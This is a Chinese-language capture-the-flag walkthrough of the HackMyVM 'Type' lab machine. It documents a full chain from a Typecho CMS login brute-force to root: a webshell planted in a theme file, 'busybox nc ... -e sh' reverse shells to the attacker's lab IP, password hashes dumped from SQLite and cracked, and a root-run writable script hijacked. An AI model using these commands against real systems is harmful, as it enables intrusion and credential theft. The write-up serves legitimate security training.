HackMyVM-Type

back to the history and remember when I was born
回眸歷史，记得我出生时
何もない砂場飛び交う雷鳴
在空无一物的沙地交错的雷鸣
しょうもない音で掠れた生命
於无谓的声音中乾涸的生命
今後千年草も生えない 砂の惑星さ
今后千百年间寸草不生的 沙漠星球

---

靶机ip:192.168.56.58

难度：中等

涉及内容：

信息搜集与边界突破：虚拟主机（Vhost）配置发现、cewl 定制字典生成、目录爆破、基于字典的后台登录爆破。

Web 安全漏洞利用：敏感信息泄露（草稿箱越权/后台利用）、Typecho CMS 核心机制利用（主题文件编辑致 RCE）。

后渗透与横向移动：SQLite 数据库文件读取与提权、密码哈希破解（John the Ripper）、密码复用漏洞（Web 账户与系统账户同步）。

Linux 本地提权 (Root Privesc)：Sudo 环境变量配置不当 (env_keep+=XAUTHORITY)、X11 界面转发 (ssh -X) 与无头验证绕过、GUI 自动化交互工具 (xdotool) 利用、可写脚本劫持（配合 Sudo 触发执行）。

---

端口扫描

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -p- 192.168.56.58
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-24 02:29 +0000
Nmap scan report for 192.168.56.58 (192.168.56.58)
Host is up (0.00057s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:1F:43:F2 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 4.34 seconds

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -p22,80 192.168.56.58 -sV -sC -T4 -A -O
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-24 02:30 +0000
Nmap scan report for 192.168.56.58 (192.168.56.58)
Host is up (0.00086s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0 (protocol 2.0)
80/tcp open  http    nginx
|_http-title: type.dsz
|_http-generator: Typecho 1.3.0
MAC Address: 08:00:27:1F:43:F2 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.86 ms 192.168.56.58 (192.168.56.58)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.02 seconds

将域名写入/etc/hosts

192.168.56.58 type.dsz

访问域名

发现两个用户，admin和sburro，同时点击admin的账户，又跳转到了一个域名devnotes.dsz

再加进去

192.168.56.58 type.dsz devnotes.dsz

同时type.dsz下面提醒我们用cewl

cewl http://devnotes.dsz/ > password.txt

目录扫描

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# dirsearch -u http://devnotes.dsz/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                           
 (_||| _) (/_(_|| (_| )                                                                                                                                    
                                                                                                                                                           
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/reports/http_devnotes.dsz/__26-04-24_02-54-16.txt

Target: http://devnotes.dsz/

[02:54:16] Starting:                                                                                                                                       
[02:54:32] 403 -  548B  - /.ht_wsr.txt                                      
[02:54:32] 403 -  548B  - /.htaccess.bak1                                   
[02:54:32] 403 -  548B  - /.htaccess.orig                                   
[02:54:32] 403 -  548B  - /.htaccess.sample
[02:54:32] 403 -  548B  - /.htaccess.save
[02:54:32] 403 -  548B  - /.htaccess_extra
[02:54:32] 403 -  548B  - /.htaccess_orig
[02:54:32] 403 -  548B  - /.htaccess_sc                                     
[02:54:32] 403 -  548B  - /.htaccessBAK                                     
[02:54:32] 403 -  548B  - /.htaccessOLD                                     
[02:54:32] 403 -  548B  - /.htaccessOLD2
[02:54:32] 403 -  548B  - /.htm                                             
[02:54:32] 403 -  548B  - /.html
[02:54:32] 403 -  548B  - /.htpasswd_test                                   
[02:54:32] 403 -  548B  - /.htpasswds
[02:54:32] 403 -  548B  - /.httr-oauth                                      
[02:54:54] 301 -    0B  - /1000  ->  http://devnotes.dsz/index.php/1000/    
[02:54:55] 301 -    0B  - /1001  ->  http://devnotes.dsz/index.php/1001/    
[02:54:55] 301 -    0B  - /1991  ->  http://devnotes.dsz/index.php/1991/    
[02:54:55] 301 -    0B  - /1995  ->  http://devnotes.dsz/index.php/1995/    
[02:54:55] 301 -    0B  - /1994  ->  http://devnotes.dsz/index.php/1994/
[02:54:55] 301 -    0B  - /1993  ->  http://devnotes.dsz/index.php/1993/
[02:54:55] 301 -    0B  - /1992  ->  http://devnotes.dsz/index.php/1992/
[02:54:55] 301 -    0B  - /1990  ->  http://devnotes.dsz/index.php/1990/
[02:54:55] 301 -    0B  - /1997  ->  http://devnotes.dsz/index.php/1997/
[02:54:55] 301 -    0B  - /1996  ->  http://devnotes.dsz/index.php/1996/
[02:54:55] 301 -    0B  - /1999  ->  http://devnotes.dsz/index.php/1999/    
[02:54:55] 301 -    0B  - /1998  ->  http://devnotes.dsz/index.php/1998/
[02:54:55] 301 -    0B  - /2000  ->  http://devnotes.dsz/index.php/2000/    
[02:54:55] 301 -    0B  - /2001  ->  http://devnotes.dsz/index.php/2001/    
[02:54:55] 301 -    0B  - /2005  ->  http://devnotes.dsz/index.php/2005/    
[02:54:55] 301 -    0B  - /2003  ->  http://devnotes.dsz/index.php/2003/
[02:54:56] 301 -    0B  - /2004  ->  http://devnotes.dsz/index.php/2004/
[02:54:56] 301 -    0B  - /2009  ->  http://devnotes.dsz/index.php/2009/
[02:54:56] 301 -    0B  - /2007  ->  http://devnotes.dsz/index.php/2007/
[02:54:56] 301 -    0B  - /2008  ->  http://devnotes.dsz/index.php/2008/
[02:54:56] 301 -    0B  - /2002  ->  http://devnotes.dsz/index.php/2002/
[02:54:56] 301 -    0B  - /2006  ->  http://devnotes.dsz/index.php/2006/    
[02:54:56] 301 -    0B  - /2010  ->  http://devnotes.dsz/index.php/2010/    
[02:54:56] 301 -    0B  - /2011  ->  http://devnotes.dsz/index.php/2011/    
[02:54:56] 301 -    0B  - /2012  ->  http://devnotes.dsz/index.php/2012/    
[02:54:56] 301 -    0B  - /2013  ->  http://devnotes.dsz/index.php/2013/    
[02:54:57] 301 -    0B  - /2014  ->  http://devnotes.dsz/index.php/2014/    
[02:54:57] 301 -    0B  - /2015  ->  http://devnotes.dsz/index.php/2015/    
[02:54:57] 301 -    0B  - /2016  ->  http://devnotes.dsz/index.php/2016/    
[02:54:57] 301 -    0B  - /2017  ->  http://devnotes.dsz/index.php/2017/    
[02:54:57] 301 -    0B  - /2018  ->  http://devnotes.dsz/index.php/2018/    
[02:54:57] 301 -    0B  - /2019  ->  http://devnotes.dsz/index.php/2019/    
[02:54:58] 301 -    0B  - /2020  ->  http://devnotes.dsz/index.php/2020/    
[02:54:58] 301 -    0B  - /2257  ->  http://devnotes.dsz/index.php/2257/    
[02:55:15] 301 -  162B  - /admin  ->  http://devnotes.dsz/admin/            
[02:55:19] 302 -    0B  - /admin/  ->  http://devnotes.dsz/admin/login.php?referer=http%3A%2F%2Fdevnotes.dsz%2Fadmin%2F
[02:55:21] 302 -    0B  - /admin/index.php  ->  http://devnotes.dsz/admin/login.php?referer=http%3A%2F%2Fdevnotes.dsz%2Fadmin%2Findex.php
[02:55:22] 200 -    5KB - /admin/login.php                                  
[02:56:28] 200 -    0B  - /config.inc.php                                   
[02:56:56] 301 -    0B  - /feed  ->  http://devnotes.dsz/index.php/feed/    
[02:57:13] 301 -  162B  - /install  ->  http://devnotes.dsz/install/        
[02:57:14] 302 -    0B  - /install.php  ->  http://devnotes.dsz/            
[02:57:14] 403 -  548B  - /install/                                         
[02:57:15] 302 -    0B  - /install.php?profile=default  ->  http://devnotes.dsz/
[02:57:23] 200 -   15KB - /LICENSE.txt                                      
[02:58:54] 301 -  162B  - /usr  ->  http://devnotes.dsz/usr/                
[02:58:54] 403 -  548B  - /usr/                                             
[02:58:55] 301 -  162B  - /var  ->  http://devnotes.dsz/var/                
[02:58:55] 403 -  548B  - /var/                                             
                                                                             
Task Completed                                                

扫到一个登录界面，用刚刚得到的两个用户名和cewl爬下来的字典进行爆破。

得到凭证

sburro:DevNotes

进入后台发现我们权限很低，无法更改主题，但之后发现草稿箱里的文本

怀疑是管理员密码，尝试登录，成功。

admin:2DbYCYpXwvV9kKwO

进入管理员后台，在当前外观的index.php下填写一句话马。

使用命令id进行测试，可以看到命令成功执行。

使用busybox反弹shell

http://devnotes.dsz/index.php?cmd=busybox%20nc%20192.168.56.104%204444%20-e%20sh;

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./penelope.py 
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.21.128 • 192.168.56.104 • 192.168.10.150 • 172.17.0.1 • 172.18.0.1
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from Type-192.168.56.58-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12 
[+] Logging to /root/.penelope/Type~192.168.56.58_Linux_x86_64/2026_04_24-03_15_02-976.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
/data/typecho $ 

进行信息搜集，发现数据库。

/data/typecho $ ls
LICENSE.txt     admin           config.inc.php  index.php       install         install.php     typecho.zip     usr             var
/data/typecho $ cd ..
/data/database $ cat /etc/passwd
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
klogd:x:100:101:klogd:/dev/null:/sbin/nologin
nginx:x:101:102:nginx:/var/lib/nginx:/sbin/nologin
caddy:x:102:104:caddy:/var/lib/caddy:/sbin/nologin
lighttpd:x:103:105:lighttpd:/var/www/localhost/htdocs:/sbin/nologin
plugugly:x:1000:1000::/home/plugugly:/bin/sh
avahi:x:86:86:Avahi System User:/dev/null:/sbin/nologin
messagebus:x:104:106:messagebus:/dev/null:/sbin/nologin
/data $ ls
certs     database  typecho
/data $ cd database/
/data/database $ ls
typecho.db

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# mv /root/.penelope/Type~192.168.56.58_Linux_x86_64/downloads/data/database/typecho.db .
                                                                                                                                                           
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# sqlite3 typecho.db 
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .tables
typecho_comments       typecho_metas          typecho_users        
typecho_contents       typecho_options      
typecho_fields         typecho_relationships
sqlite> select * from typecho_users;
1|admin|$P$B/xZAkZ342fLS1sEQwQfsXTVKiBnVG/|admin@type.dsz|http://type.dsz/|admin|1771773701|1777000500|1771815254|administrator|210e70dd6a261e5533998656d6682e03
2|sburro|$P$BfS2sY4Vz6sHjC52095jVAFOjMNyuy1|sburro@type.dsz||sburro|1771774529|1777000205|1771775693|contributor|43792074121946b7b1fc0b8942b218ac
3|plugugly|$P$BuyKfLj9xZ0iLez6SomJNOLGx.7g.U/|plugugly@type.dsz||plugugly|1771812079|0|0|subscriber|
sqlite> 

这里注意到有一个用户和系统用户同名，怀疑密码复用

使用john爆破哈希

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# john hash.txt -show
?:2boobies

1 password hash cracked, 0 left

得到凭证

plugugly:2boobies

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ssh plugugly@192.168.56.58        
The authenticity of host '192.168.56.58 (192.168.56.58)' can't be established.
ED25519 key fingerprint is: SHA256:xJ90oWmr5sPR2afHz9etzSdtxINmLI+JvbwgV/iCsWY
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:11: [hashed name]
    ~/.ssh/known_hosts:92: [hashed name]
    ~/.ssh/known_hosts:107: [hashed name]
    ~/.ssh/known_hosts:116: [hashed name]
    ~/.ssh/known_hosts:139: [hashed name]
    ~/.ssh/known_hosts:140: [hashed name]
    ~/.ssh/known_hosts:166: [hashed name]
    ~/.ssh/known_hosts:177: [hashed name]
    (2 additional names omitted)
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.58' (ED25519) to the list of known hosts.
plugugly@192.168.56.58's password: 
              _                          
__      _____| | ___ ___  _ __ ___   ___ 
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
 \ V  V /  __/ | (_| (_) | | | | | |  __/
  \_/\_/ \___|_|\___\___/|_| |_| |_|\___|
                                         
Type:~$ 

Type:~$ sudo -l
Matching Defaults entries for plugugly on Type:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=XAUTHORITY

Runas and Command-specific defaults for plugugly:
    Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User plugugly may run the following commands on Type:
    (ALL) NOPASSWD: /root/typer.py
Type:~$ sudo /root/typer.py
qt.qpa.xcb: could not connect to display 
qt.qpa.plugin: From 6.5.0, xcb-cursor0 or libxcb-cursor0 is needed to load the Qt xcb platform plugin.
qt.qpa.plugin: Could not load the Qt platform plugin "xcb" in "" even though it was found.
This application failed to start because no Qt platform plugin could be initialized. Reinstalling the application may fix this problem.

Available platform plugins are: linuxfb, vkkhrdisplay, minimal, wayland-egl, minimalegl, xcb, vnc, offscreen, wayland, eglfs.

Aborted
Type:~$ 

运行此文件需要图形界面。

使用x11转发图形界面到本地的kali上。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ssh -X plugugly@192.168.56.58
plugugly@192.168.56.58's password: 
              _                          
__      _____| | ___ ___  _ __ ___   ___ 
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
 \ V  V /  __/ | (_| (_) | | | | | |  __/
  \_/\_/ \___|_|\___\___/|_| |_| |_|\___|
                                         
/usr/bin/xauth:  file /home/plugugly/.Xauthority does not exist
Type:~$ 
Type:~$ export XAUTHORITY=/home/plugugly/.Xauthority
Type:~$ sudo /root/typer.py

是一个打字小游戏，要求我们的wpm大于60

使用 xdotool 模拟键盘输入

sleep 3; xdotool type --delay 20 "It was the best of times, it was the worst of times, it was the age of wisdom, it was the age of foolishness, it was the epoch of belief, it was the epoch of incredulity, it was the season of Light, it was the season of Darkness, it was the spring of hope, it was the winter of despair."

Type:~$ sudo /root/typer.py
Cleanup process started by root...

启动了某个进程

上传linpeas分析

╔══════════╣ .sh files in path
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scriptbinaries-in-path                                                   
You can write script: /usr/local/bin/cleanup_scores.sh                                                                                                     
/usr/bin/spirv-lesspipe.sh
/usr/bin/findssl.sh
/usr/bin/amuFormat.sh

Type:~$ cat /usr/local/bin/cleanup_scores.sh
#!/bin/sh
echo 'Cleanup process started by root...'
Type:~$ 

由于靶机是极度精简的alpine系统，这里直接写入反弹shell的命令即可

Type:~$ echo "busybox nc 192.168.56.104 4444 -e sh" >> /usr/local/bin/cleanup_scores.sh
Type:~$ sudo -l
Matching Defaults entries for plugugly on Type:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=XAUTHORITY

Runas and Command-specific defaults for plugugly:
    Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User plugugly may run the following commands on Type:
    (ALL) NOPASSWD: /root/typer.py
Type:~$ sudo /root/typer.py
Cleanup process started by root...

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./penelope.py 
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.21.128 • 192.168.56.104 • 192.168.10.150 • 172.17.0.1 • 172.18.0.1
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from Type-192.168.56.58-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12 
[+] Logging to /root/.penelope/Type~192.168.56.58_Linux_x86_64/2026_04_24-03_34_38-039.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
/home/plugugly # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/home/plugugly #